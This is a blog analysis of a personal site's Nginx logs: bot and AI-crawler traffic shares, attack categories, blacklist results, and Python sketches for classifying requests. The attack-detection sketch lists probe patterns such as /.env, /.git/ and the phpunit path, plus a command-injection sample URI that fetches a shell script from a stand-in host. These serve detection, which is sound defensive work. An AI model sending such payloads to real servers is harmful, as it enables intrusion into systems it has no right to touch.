Uncovering Bot Traffic: Why AI Crawlers Dominate 47% of My Site’s Visits

An analysis of nearly a year of Nginx access logs shows that bots, including a growing share of AI crawlers, generate about 47% of all requests, while real users account for under 43%. The breakdown also covers security threats, attack patterns, and blacklist effectiveness, with traffic examined by month, day, and hour.

Tech Musings

Overview

The personal blog 2tuan.work has been running for almost a year since its domain change. This analysis uses its Nginx access logs to examine traffic composition, bot behavior, attack activity, and user engagement from both an operational and a security perspective.
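As a starting point for this kind of analysis, here is a minimal sketch of parsing one access-log line. It assumes the default Nginx "combined" log format; the article does not say which log_format the site uses, and the sample line, the `LOG_PATTERN` name, and the `parse_line` helper are all illustrative.

```python
import re
from datetime import datetime

# Assumes the default Nginx "combined" format; a custom log_format
# would need a different pattern.
LOG_PATTERN = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not match."""
    match = LOG_PATTERN.match(line)
    if match is None:
        return None
    entry = match.groupdict()
    # Nginx writes timestamps like 10/Feb/2025:22:15:03 +0800.
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry

# Hypothetical sample line, not taken from the real logs.
sample = (
    '203.0.113.7 - - [10/Feb/2025:22:15:03 +0800] '
    '"GET /posts/hello HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (compatible; GPTBot/1.0)"'
)
entry = parse_line(sample)
print(entry["ip"], entry["status"], entry["user_agent"])
```

Every later step (bot classification, attack detection, time bucketing) can work from dictionaries shaped like `entry`.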

Key Metrics

Total requests (excluding admin IPs): 416,179

Detected attacks: 37,392

Attack‑origin IPs: 2,087

Blacklist‑blocked IPs: 11,530

Unique visitor IPs: 39,036

Real user visits: 19,874 (42.62% of traffic)

Traffic Composition

Normal user traffic: 42.6% (177,375 requests)

Bot traffic (including SEO, search engines, AI crawlers): 47.1% (196,199 requests)

Requests without User‑Agent: 10.2% (42,605 requests)

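Attack traffic: 9.0% (37,392 attempts). This figure overlaps the three categories above, which together already account for all 416,179 requests.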
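The percentages above can be checked directly from the request counts. The short sketch below uses only the figures listed in this article; the dictionary keys are illustrative names.

```python
# Request counts as reported in the Traffic Composition list.
counts = {
    "normal_users": 177_375,
    "bots": 196_199,
    "no_user_agent": 42_605,
}
attack_requests = 37_392

# The three categories are disjoint, so their sum is the total request count.
total = sum(counts.values())
shares = {name: round(100 * n / total, 1) for name, n in counts.items()}

# Attack requests are measured against the same total, not added to it.
attack_share = round(100 * attack_requests / total, 1)

print(total, shares, attack_share)
```

The three categories sum to the reported total of 416,179, which is why the attack share sits on top of them rather than alongside them.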

Bot Classification

Four major bot categories were identified:

SEO crawlers: 37,877 requests, 2,296 unique IPs, avg 16.5 req/IP.

Search engine bots: 45,783 requests, 4,111 unique IPs, avg 11.1 req/IP.

AI crawlers: 29,228 requests, 1,989 unique IPs, avg 14.7 req/IP.

Monitoring scanners: 4,162 requests, 496 unique IPs, avg 8.4 req/IP.
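The per-category figures (requests, unique IPs, average requests per IP) could be produced along these lines. This is a sketch only: the User-Agent tokens in `BOT_CATEGORIES` are a small assumed sample of well-known crawler names, not the author's actual rule set, and the sample requests are made up.

```python
from collections import defaultdict

# Assumed, incomplete token lists; the article does not publish its rules.
BOT_CATEGORIES = {
    "ai_crawler": ("bytespider", "gptbot", "claudebot"),
    "seo_crawler": ("ahrefsbot", "semrushbot", "mj12bot"),
    "search_engine": ("googlebot", "bingbot", "baiduspider"),
    "monitoring_scanner": ("uptimerobot", "censysinspect"),
}

def classify_bot(user_agent):
    """Return the first category whose token appears in the User-Agent, else None."""
    ua = user_agent.lower()
    for category, tokens in BOT_CATEGORIES.items():
        if any(token in ua for token in tokens):
            return category
    return None

def summarize(requests):
    """requests: iterable of (ip, user_agent). Returns per-category statistics."""
    hits = defaultdict(int)
    ips = defaultdict(set)
    for ip, user_agent in requests:
        category = classify_bot(user_agent)
        if category is None:
            continue
        hits[category] += 1
        ips[category].add(ip)
    return {
        category: {
            "requests": hits[category],
            "unique_ips": len(ips[category]),
            "avg_per_ip": round(hits[category] / len(ips[category]), 1),
        }
        for category in hits
    }

# Hypothetical requests for illustration.
sample_requests = [
    ("192.0.2.1", "Mozilla/5.0 (compatible; GPTBot/1.0)"),
    ("192.0.2.1", "Mozilla/5.0 (compatible; GPTBot/1.0)"),
    ("192.0.2.2", "Mozilla/5.0 (compatible; Bytespider)"),
    ("192.0.2.3", "Mozilla/5.0 (compatible; AhrefsBot/7.0)"),
    ("192.0.2.4", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
]
stats = summarize(sample_requests)
print(stats)
```

Substring matching on User-Agent is easy to spoof, so the results are best read as self-declared bot traffic.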

AI Crawler Insights

AI crawler traffic spiked in February 2025 (5,529 requests, 17.18% of that month's traffic) and peaked again in August 2025 (4,766 requests, 10.47%). Bytespider dominates with 49.6% of AI crawler requests, followed by GPTBot (23.9%) and ClaudeBot (14.2%).
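A monthly share like the ones quoted above is the number of AI crawler requests divided by all requests in the same month. A minimal sketch follows, assuming records have already been reduced to (month, User-Agent) pairs; `AI_TOKENS` covers only the three crawlers named here and the sample records are invented.

```python
from collections import Counter

# Only the three crawlers named in the article; a real list would be longer.
AI_TOKENS = ("bytespider", "gptbot", "claudebot")

def monthly_ai_share(records):
    """records: iterable of (month, user_agent), with month like '2025-02'.

    Returns {month: percentage of that month's requests made by AI crawlers}.
    """
    total = Counter()
    ai = Counter()
    for month, user_agent in records:
        total[month] += 1
        if any(token in user_agent.lower() for token in AI_TOKENS):
            ai[month] += 1
    return {month: round(100 * ai[month] / total[month], 2) for month in total}

# Hypothetical records for illustration.
records = [
    ("2025-02", "Mozilla/5.0 (compatible; GPTBot/1.0)"),
    ("2025-02", "Mozilla/5.0 (Windows NT 10.0)"),
    ("2025-02", "Mozilla/5.0 (compatible; Bytespider)"),
    ("2025-02", "curl/8.4.0"),
    ("2025-03", "Mozilla/5.0 (Windows NT 10.0)"),
]
share_by_month = monthly_ai_share(records)
print(share_by_month)
```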

Tooling and Language Distribution

Other/custom clients: 84.5% of malicious/unknown bot requests.

Go‑based tools: 7.1% (4,693 requests).

Python tools: 4.8% (3,196 requests).

cURL: 3.4% (2,251 requests).

Java, Node.js, Wget each < 0.3%.
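Tool attribution of this kind usually relies on the default User-Agent strings that HTTP libraries send. The sketch below is an assumption about how such a mapping might look, not the author's rule set; the signature list is illustrative and any client can override its User-Agent.

```python
# Assumed default User-Agent fragments for common HTTP clients.
TOOL_SIGNATURES = [
    ("go", ("go-http-client",)),
    ("python", ("python-requests", "python-urllib", "aiohttp")),
    ("curl", ("curl/",)),
    ("wget", ("wget/",)),
    ("java", ("java/", "apache-httpclient")),
    ("nodejs", ("node-fetch", "axios/")),
]

def detect_tool(user_agent):
    """Map a User-Agent string to a tool family, or 'other' if nothing matches."""
    ua = user_agent.lower()
    for tool, fragments in TOOL_SIGNATURES:
        if any(fragment in ua for fragment in fragments):
            return tool
    return "other"

for ua in ("Go-http-client/1.1", "python-requests/2.31.0", "curl/8.4.0", "CustomScanner"):
    print(ua, "->", detect_tool(ua))
```

Anything that falls through to "other" corresponds to the large other/custom bucket in the list above.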

Attack Types

Information‑leakage scans: 27,393 (73.3%).

Command injection: 4,521 (12.1%).

CVE exploitation: 4,104 (11.0%).

Path traversal: 726 (1.9%).

Brute‑force login attempts: 609 (1.6%).

SQL injection: 38 (0.1%).

XSS: 1 (0.0%).

Typical detection patterns include requests for /.env, /.git/, and /vendor/phpunit/phpunit, as well as shell‑execution strings matched by a regex such as ;.*sh\s+.
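The detection patterns mentioned above can be expressed as a small ordered rule list. This is a sketch under assumptions: the mapping of each pattern to an attack type is a guess, the shell-execution pattern is read as the regex `;.*sh\s+`, and URL-decoding before matching is a choice made here, not something the article states.

```python
import re
from urllib.parse import unquote

# Pattern-to-category mapping is assumed for illustration.
ATTACK_PATTERNS = [
    ("information_leakage", re.compile(r"/\.env\b|/\.git/")),
    ("cve_exploitation", re.compile(r"/vendor/phpunit/phpunit")),
    ("command_injection", re.compile(r";.*sh\s+")),
]

def classify_attack(request_uri):
    """Return the first matching attack label for a request URI, else None."""
    # Decode %20 and similar escapes so whitespace-based patterns can match.
    decoded = unquote(request_uri)
    for label, pattern in ATTACK_PATTERNS:
        if pattern.search(decoded):
            return label
    return None

# Hypothetical request URIs for illustration.
for uri in (
    "/.env",
    "/.git/config",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/index.php?cmd=id;wget%20http://x.test/a.sh%20-O-",
    "/posts/hello",
):
    print(uri, "->", classify_attack(uri))
```

Rule order matters: a request matching several patterns is counted once, under the first label that matches.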

Blacklist Effectiveness

The OpenResty blacklist script blocked 11,530 malicious IPs, rejecting 159,980 requests (≈9% of total traffic). This reduced server load and mitigated many attack vectors.
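The article does not show the OpenResty script itself. As a rough offline analogue, the sketch below picks IPs that appear in repeated attack requests and renders them as standard Nginx `deny` directives. The threshold of 5 and the helper names are hypothetical, and this is not the author's Lua implementation.

```python
from collections import Counter

def build_blacklist(attack_ips, threshold=5):
    """Return sorted IPs seen in at least `threshold` attack requests.

    The default threshold is an arbitrary illustrative value.
    """
    counts = Counter(attack_ips)
    return sorted(ip for ip, n in counts.items() if n >= threshold)

def render_deny_rules(ips):
    """Render one Nginx `deny` directive per IP, one per line."""
    return "\n".join(f"deny {ip};" for ip in ips)

# Hypothetical source IPs of detected attack requests.
attack_ips = ["198.51.100.9"] * 6 + ["203.0.113.4"] * 2 + ["192.0.2.77"] * 5
blacklist = build_blacklist(attack_ips)
rules = render_deny_rules(blacklist)
print(rules)
```

A file of such directives can be pulled into a server block with `include`, though a dynamic blacklist like the one described here avoids reloading Nginx on every change.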

User Behavior

Total real‑user requests: 177,375.

Average requests per user: 7.9.

User activity distribution: 91.5% light users (<10 visits), 6.8% moderate (10‑49 visits), 1.7% heavy (≥50 visits).
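The light, moderate, and heavy tiers follow directly from per-visitor request counts. A minimal sketch using the thresholds stated above; treating one IP as one user is an assumption, and the sample counts are invented.

```python
from collections import Counter

def activity_tier(visits):
    """Tier thresholds as given in the article: <10, 10-49, >=50."""
    if visits < 10:
        return "light"
    if visits < 50:
        return "moderate"
    return "heavy"

def tier_distribution(visits_per_user):
    """visits_per_user: {user_id: visit count}. Returns {tier: percentage}."""
    tiers = Counter(activity_tier(n) for n in visits_per_user.values())
    total = sum(tiers.values())
    return {tier: round(100 * count / total, 1) for tier, count in tiers.items()}

# Hypothetical per-IP visit counts, treating each IP as one user.
visits_per_user = {"a": 1, "b": 9, "c": 10, "d": 49, "e": 50}
distribution = tier_distribution(visits_per_user)
print(distribution)
```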

Temporal Patterns

Total requests peaked in July 2025 (52,106 requests), while real‑user requests peaked in March 2025 (20,129 requests). Hourly analysis shows that normal users are most active on Mondays between 22:00 and 22:59, while bots peak on Mondays between 18:00 and 18:59.
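Finding a peak weekday and hour comes down to bucketing request timestamps. The sketch below assumes timestamps are already parsed into `datetime` objects in the site's local time zone; the `peak_weekday_hour` helper and the sample timestamps are illustrative.

```python
from collections import Counter
from datetime import datetime

WEEKDAYS = ("Monday", "Tuesday", "Wednesday", "Thursday",
            "Friday", "Saturday", "Sunday")

def peak_weekday_hour(timestamps):
    """Return ((weekday name, hour), request count) for the busiest hourly slot."""
    buckets = Counter((WEEKDAYS[ts.weekday()], ts.hour) for ts in timestamps)
    return buckets.most_common(1)[0]

# Hypothetical timestamps; 3 March 2025 was a Monday.
timestamps = [
    datetime(2025, 3, 3, 22, 5),
    datetime(2025, 3, 3, 22, 40),
    datetime(2025, 3, 4, 9, 0),
]
slot, count = peak_weekday_hour(timestamps)
print(slot, count)
```

Running this separately on real-user and bot requests would give the two peaks compared above.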

Key Takeaways

Real users generate less than half of the traffic; bots dominate.

AI crawlers are a growing segment, with Bytespider leading.

Security threats are primarily information‑leakage scans and command‑injection attempts.

Blacklist rules are effective, blocking over 11k malicious IPs.

Understanding bot signatures (User‑Agent strings, request patterns) helps refine detection.
